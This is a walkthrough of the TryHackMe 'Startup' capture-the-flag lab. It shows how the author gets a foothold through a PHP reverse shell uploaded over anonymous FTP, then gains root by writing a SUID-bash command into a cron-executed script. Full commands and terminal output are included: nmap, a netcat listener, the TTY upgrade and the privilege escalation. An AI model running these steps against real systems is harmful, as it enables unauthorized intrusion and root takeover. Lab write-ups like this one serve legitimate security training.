Startup TryHackMe Writeup
Startup is a boot2root challenge available on TryHackMe. This is an easy level box which includes compromising a web server by uploading our web shell via FTP and then exploiting a cronjob to get the root shell. Let's get started!
Challenge Link: https://tryhackme.com/room/startup
I started the initial enumeration by running a port scan using nmap looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ nmap -sC -sV -oN nmap/initial 10.10.254.238 Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 20:34 IST Nmap scan report for 10.10.254.238 Host is up (0.16s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt | ftp-syst: | STAT: | FTP server status: | Connected to 10.17.12.59 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) | 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) |_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Maintenance Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds
We have three ports open, FTP running on port 21, SSH running on port 22 and Apache web server running on port 80. We can also see that FTP has anonymous login enabled so let's enumerate it first.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ ftp 10.10.254.238 Connected to 10.10.254.238. 220 (vsFTPd 3.0.3) Name (10.10.254.238:madhav): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt 226 Directory send OK.
I downloaded all the files from the FTP server and started enumerating them one by one.
ftp> get important.jpg local: important.jpg remote: important.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for important.jpg (251631 bytes). 226 Transfer complete. 251631 bytes received in 2.23 secs (109.9752 kB/s) ftp> get notice.txt local: notice.txt remote: notice.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for notice.txt (208 bytes). 226 Transfer complete. 208 bytes received in 0.00 secs (114.5011 kB/s) ftp> cd ftp 250 Directory successfully changed. ftp> ls -lah 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 . drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 .. 226 Directory send OK. ftp> exit 221 Goodbye.
There is an image named important.jpg, a text file named notice.txt and there was also a ftp directory which was empty.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ cat notice.txt Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
I tried extracting data from the image using exiftool and binwalk but it did not contain any useful information. So now let's start enumerating the web server running on port 80.
There was nothing interesting on the homepage, so I ran a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ gobuster dir -u http://10.10.254.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.254.238 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/11/01 20:37:04 Starting gobuster in directory enumeration mode =============================================================== /files (Status: 301) [Size: 314] [--> http://10.10.254.238/files/] /server-status (Status: 403) [Size: 278] =============================================================== 2021/11/01 21:35:26 Finished ===============================================================
There is a directory named files which contains the same content as the FTP.
I went back to the FTP and checked if we had permission to upload our own files. I tested it by uploading a sample file.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ ftp 10.10.254.238 Connected to 10.10.254.238. 220 (vsFTPd 3.0.3) Name (10.10.254.238:madhav): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt 226 Directory send OK. ftp> cd ftp 250 Directory successfully changed. ftp> put sample.txt local: sample.txt remote: sample.txt 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5 bytes sent in 0.00 secs (46.0643 kB/s) ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxrwxr-x 1 112 118 5 Nov 01 15:31 sample.txt 226 Directory send OK. ftp> exit 221 Goodbye.
The file was uploaded successfully and it was also reflected on the web server. Now if we visit
http://10.10.254.238/files/ftp/, there will be a file named sample.txt.
Using the same method, I uploaded a php reverse shell and executed it from the web server.
After running the php reverse shell, we will get a reverse shell back into our system.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.17.12.59] from (UNKNOWN) [10.10.254.238] 49696 Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 16:31:01 up 1:27, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
I upgraded the reverse shell into a fully interactive TTY using the following commands. This will allow us to use tab completion and the clear command.
python3 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z stty raw -echo && fg reset export TERM=xterm stty rows 48 columns 179
Next, I checked the home directory and there was a user named lennie but we do not have access to its home directory.
www-data@startup:/$ ls -lah /home total 12K drwxr-xr-x 3 root root 4.0K Nov 12 2020 . drwxr-xr-x 25 root root 4.0K Nov 1 15:04 .. drwx------ 4 lennie lennie 4.0K Nov 12 2020 lennie
Next I checked the root directory and in there, we have a folder named /incidents and a file named recipe.txt.
www-data@startup:/$ ls bin dev home initrd.img lib lost+found mnt proc root sbin srv tmp vagrant vmlinuz boot etc incidents initrd.img.old lib64 media opt recipe.txt run snap sys usr var vmlinuz.old
Inside the incidents directory, we have a file named suspicious.pcapng. I downloaded this file on my computer and opened it with wireshark.
After opening, I went to the TCP packets and then right click on the packet > Follow > TCP Stream.
Inside this there were shell commands that the user tried to run on the system and when you scroll down, you'll find the password for user lennie.
Now we can login as user lennie via SSH and read our user flag.
┌──(madhav㉿kali)-[~/ctf/thm/startup] └─$ ssh email@example.com The authenticity of host '10.10.254.238 (10.10.254.238)' can't be established. ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.254.238' (ECDSA) to the list of known hosts. firstname.lastname@example.org's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 44 packages can be updated. 30 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. $ bash lennie@startup:~$ ls Documents scripts user.txt lennie@startup:~$ wc -c user.txt 38 user.txt lennie@startup:~$
Now that we have a shell as user lennie, our next step would be to get a root shell on the box. I ran
sudo -l command to see if user lennie can run any command as root and also checked if there were any interesting SUID files but there was no luck.
Next I uploaded pspy and found that
/home/lennie/scripts/planner.sh is being executed as user root after every minute by a cronjob.
Now I checked the
scripts/planner.sh present in the home directory of user lennie.
lennie@startup:~/scripts$ cat planner.sh #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.sh
We do not have writable permission for the file but we can see the file is executing another script named
/etc/print.sh. I checked the permission for this file and yes, we have the permissions to modify the file.
lennie@startup:~/scripts$ ls -lah /etc/print.sh -rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
So I ran the following command to modify
lennie@startup:~/scripts$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > /etc/print.sh
When the script will be executed, it will copy the
/tmp directory and make it a SUID.
lennie@startup:~/scripts$ ls -l /tmp total 1016 -rwsr-sr-x 1 root root 1037528 Nov 1 17:40 bash
We can see that this file has special permissions! Now we can get a root shell by running the
/tmp/bash -p command. Once we are root, we can read our root flag present in the /root directory!
lennie@startup:~/scripts$ /tmp/bash -p bash-4.3# id uid=1002(lennie) gid=1002(lennie) euid=0(root) egid=0(root) groups=0(root),1002(lennie) bash-4.3# cd /root bash-4.3# wc -c root.txt 38 root.txt
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Fábio Lobo.